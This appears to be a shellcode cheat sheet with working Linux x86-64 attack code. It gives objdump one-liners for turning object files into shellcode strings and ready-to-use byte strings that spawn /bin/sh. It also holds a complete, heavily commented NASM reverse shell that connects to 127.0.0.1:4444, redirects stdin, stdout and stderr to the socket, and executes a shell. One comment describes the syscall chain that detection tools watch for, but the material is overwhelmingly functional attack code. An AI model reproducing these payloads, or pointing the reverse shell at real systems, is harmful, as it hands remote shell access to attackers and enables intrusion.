Extract the shellcode bytes from the compiled object file using objdump:
objdump -d ./Exit.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
Output: "\x48\x31\xc0\xb0\x3c\x48\x31\xff\x0f\x05"
for i in $(objdump -d Exit.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo
Execve
"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05";
/bin/sh
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
x86-64 TCP Reverse Shell
# Compile, inspect, and extract the shellcode
nasm -f elf64 stack.nasm -o stack.o
objdump -M intel -D stack.o
ld stack.o -o stack
for i in $(objdump -D ./rev |grep "^ " |cut -f2); do echo -n '\x'$i; done; echo
Shellcode source starts here
; Linux x86-64 reverse-shell listing (NASM, Intel syntax). Raw syscalls only,
; no libc; this is the ELF entry point, not a callable function, so no
; calling-convention prologue/epilogue applies.
; Syscall ABI used throughout: rax = number; args in rdi, rsi, rdx; the kernel
; clobbers rcx and r11, the argument registers survive, which is why rdi can
; hold the socket fd across several syscalls below.
; Call chain: socket -> connect -> dup2 x3 -> execve. Defensive note: this
; four-syscall chain issued by one process is the generic reverse-shell
; pattern that syscall auditing and seccomp policies key on; it is far more
; stable to detect than any particular byte string.
section .text
global _start
_start:
; clearing rax, rdi, rsi, rdx
xor rax, rax
xor rdi, rdi
xor rsi, rsi
xor rdx, rdx
;socket: fd = socket(AF_INET=2, SOCK_STREAM=1, protocol=0) - rdx is already 0
add rax, 41 ;syscall number for socket
add rdi, 2
add rsi, 1
syscall
mov rdi, rax ; rdi = socket fd; stays live through connect and the dup2 loop
; preparing structure for connect
; The 16-byte sockaddr_in is built on the stack from its last field to its
; first, so that rsp ends up pointing at sin_family.
; IP - 127.0.0.1 - pushed as 0x0100007f (bytes 7f 00 00 01 in memory).
; In 64-bit mode this push writes 8 bytes; the upper 4 bytes are zero and
; double as the sin_zero padding.
push 0x0100007f
; Port 9999 - 270F - 0x0f27
; Port 4444 - 115c - 0x5c11 (network byte order: bytes 11 5c in memory)
push word 0x5c11
push word 0x2 ; sin_family = AF_INET
;connect(fd, &sockaddr_in, 16)
mov rsi, rsp ; rsi = address of the struct just built
add rdx, 0x10
xor rax, rax
add rax, 42
syscall
; NOTE: connect's return value in rax is never checked; on failure execution
; still falls through to dup2/execve against an unconnected fd.
xor rsi, rsi
add rsi, 2
; dup2(fd, 2), dup2(fd, 1), dup2(fd, 0): point stderr, stdout, stdin at the
; socket. rdi still holds fd; rsi counts 2 -> 1 -> 0.
loop:
xor rax, rax
add rax, 33 ; syscall number for dup2
syscall
dec rsi
jns loop ; loop exits when rsi goes from 0 to -1 (sign flag set)
;execve("//bin/sh", NULL, NULL)
xor rax, rax
mov rdx, rax ; NULL for argument 3
mov rsi, rdx ;NULL for argument 2
push rax ; 8 zero bytes: NUL terminator for the path string
mov rbx, 0x68732f6e69622f2f ; "//bin/sh" little-endian; the doubled '/' pads the path to exactly 8 bytes
push rbx
mov rdi, rsp ; rdi = pointer to the path on the stack
add rax, 59 ; syscall number for execve
syscall